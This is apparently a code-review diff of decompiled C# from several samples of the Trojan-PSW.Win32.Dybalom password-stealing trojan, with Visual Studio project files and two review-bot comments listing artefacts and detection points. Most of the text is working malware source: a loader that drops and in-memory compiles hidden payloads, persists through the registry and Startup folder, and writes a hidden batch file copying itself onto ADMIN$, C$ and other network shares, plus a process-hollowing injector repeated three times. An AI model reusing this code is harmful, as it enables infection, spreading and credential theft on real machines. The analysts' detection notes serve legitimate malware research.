ResourceManager resourceManager = new ResourceManager("H", Assembly.GetExecutingAssembly());
string Expression = Conversions.ToString(resourceManager.GetObject("K4T8F6c"));
FHQnUxOuBUcRwss fhQnUxOuBucRwss = new FHQnUxOuBUcRwss(Conversions.ToString(resourceManager.GetObject("N1HXjA")));
string[] strArray = Strings.Split(Expression, "SuZz5vnl5M1s6Sra");
string Right = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("śƕšŽ´", "So8dxq7eL5m3PMUH");
string str1 = Conversions.ToString(Operators.ConcatenateObject((object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"), Operators.AddObject(resourceManager.GetObject("WggM2"), (object) ".exe")));
try
{
Process process = (Process) null;
Process[] processes = Process.GetProcesses();
int index = 0;
if (index < processes.Length)
goto label_6;
else
goto label_7;
label_3:
if (System.IO.File.Exists(str1))
{
System.IO.File.Delete(str1);
goto label_9;
}
else
goto label_9;
label_6:
process = processes[index];
if (!str1.Contains(process.ProcessName))
goto label_3;
label_7:
process.Kill();
goto label_3;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_9:
try
{
MyProject.Computer.FileSystem.WriteAllBytes(str1, fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("UntJ0")))), false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
YUGFYLIGvlfiyl.kXKlIGiQhTXwXic("MonAMour", "R", YUGFYLIGvlfiyl.CC(Conversions.ToString(resourceManager.GetObject("nerdz"))), new object[2]
{
(object) fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("tZAsD")))),
(object) str1
});
new Thread(new ThreadStart(YUGFYLIGvlfiyl.CiMbIOhpfLGHFKu)).Start();
try
{
object environmentVariable = (object) Environment.GetEnvironmentVariable("temp");
Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW")).SetValue("Win32", Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe"));
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe")));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject((object) Environment.GetFolderPath(Environment.SpecialFolder.Startup), (object) "\\erPCyQY.exe")));
ProjectData.ClearProjectError();
}
YUGFYLIGvlfiyl.searchDrives();
string str2 = MyProject.Computer.FileSystem.SpecialDirectories.CurrentUserApplicationData + YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ţƙŲŮūƐſƌŖĶƒŴţ´", "SnULKmdi4TyHJsgC");
try
{
Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
Dns.GetHostEntry(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
System.IO.File.Copy(Application.ExecutablePath, YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
object Instance = (object) new StreamWriter("C:\\LcvHEwb.bat");
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŇŪŇŶƒĥŚƊƐĝłħƄƙŒžŲĥœŴƉ´", "SQ0ZoQ7pvIhSns9i")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) "net view >log.txt"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŭƑųōīşĘłĬšļƇƄŁŏƕŶƉįơŴŭġĽūŜļņĶ´", "SnMyHEDiS9hjbmsu")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\IPC$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\ADMIN$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\D$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\PRINT$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\d$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ")"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "Close", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
new Process()
{
StartInfo = {
WindowStyle = ProcessWindowStyle.Hidden,
FileName = "C:\\LcvHEwb.bat"
}
}.Start();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (Operators.CompareString(strArray[2], Right, false) != 0)
;
if (Operators.CompareString(strArray[4], Right, false) != 0)
;
}
private static bool kXKlIGiQhTXwXic(
string Class,
string Void,
Assembly file,
object[] Parameters)
{
bool boolean;
try
{
System.Type type = file.GetType(Class);
if ((object) type != null)
{
MethodInfo method = type.GetMethod(Void);
if ((object) method != null)
{
boolean = Conversions.ToBoolean(method.Invoke((object) null, Parameters));
goto label_6;
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_6:
return boolean;
}
public static Assembly CC(string Source)
{
YUGFYLIGvlfiyl.urPkJBxJaoKxHfa = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("űƖŵƦƶǀÛ", "Sh2jiulGpHtnnVzW");
YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƾǃƂƩƱŏƬơƺÛ", "Sju3iiFmZsEiQdJe");
YUGFYLIGvlfiyl.RedtwzrQfYIqsNp = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƜƜƜƔǁĺƀųƞƣƆŵƮƍƍƢőƍƔƛÛ", "SHNMTy1X7UgD5fMD");
YUGFYLIGvlfiyl.uIFnBaaCKWySxWn = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ĐńŔŒņĬŲũŐğųĞĬ\u008E", "SFZcD8uiUWmXhX8w");
CompilerParameters options = new CompilerParameters();
CodeDomProvider provider = CodeDomProvider.CreateProvider(YUGFYLIGvlfiyl.urPkJBxJaoKxHfa);
options.GenerateExecutable = false;
options.GenerateInMemory = true;
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm);
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.RedtwzrQfYIqsNp);
options.CompilerOptions = YUGFYLIGvlfiyl.uIFnBaaCKWySxWn;
options.TreatWarningsAsErrors = false;
return provider.CompileAssemblyFromSource(options, Source).CompiledAssembly;
}
}
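Review bot: Nothing in this hunk tells an analyst which host artefacts `YUGFYLIGvlfiyl` leaves behind, and the goto-heavy decompiler output makes them slow to extract; a short header comment above the class should list them. From the visible lines that comment would read `// Artefacts: %APPDATA%\<own exe name> (re-checked every 5 s), <removable drive>\erPCyQY.exe + hidden autorun.inf, C:\LcvHEwb.bat, debug.exe on share paths, registry value "Win32"`. `CC` compiles a resource string through `CodeDomProvider`, which normally shows up as a compiler child process of the sample, so that is worth naming as a detection point as well. In `Main` the key is opened with the one-argument `OpenSubKey(...)` before `SetValue("Win32", …)`, whereas `gjbzPIrZcwZdrCX` passes `true`. The `Main` write therefore presumably throws and the catch branch's copy into the Startup folder is what runs, which should be confirmed in a sandbox and recorded in the comment.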
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: sxqoj64a, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 85FE03F2-BE0C-43D8-AE8D-69F7178EA945
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
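Review bot: `IX.R` has no comment naming the pattern its P/Invoke sequence forms, and the bare constants hide it: `CreateProcess` with creation `4`, `NtUnmapViewOfSection`, `VirtualAllocEx` with `12288`/`64`, `WriteProcessMemory`, `SetThreadContext`, then `ResumeThread`, the sequence usually catalogued as process hollowing. A comment above `R` such as `// creation 4 = CREATE_SUSPENDED; 12288 = MEM_COMMIT|MEM_RESERVE; 64 = PAGE_EXECUTE_READWRITE` would let a detection engineer map the listing to API-call telemetry without re-deriving the values. The comment should also record that `R` returns `true` on every path except an exception, so the return value does not show whether the surrogate process was actually modified. The `ToInt32()` calls and fixed context indices suggest the routine assumes a 32-bit target, which is worth a hedged note. The same class appears again in the later `IX` hunks on this page (the last one is cut off), so the comment applies there too.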
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>sxqoj64a</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sxqoj64a", "Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.csproj", "{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: lmyuayzw, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C7DC3372-01FA-4B26-9802-388A7CD3ED9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>lmyuayzw</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "lmyuayzw", "Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.csproj", "{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: rern5947, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B36B2BF-40BC-44F3-B93C-15B2B8352B1E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
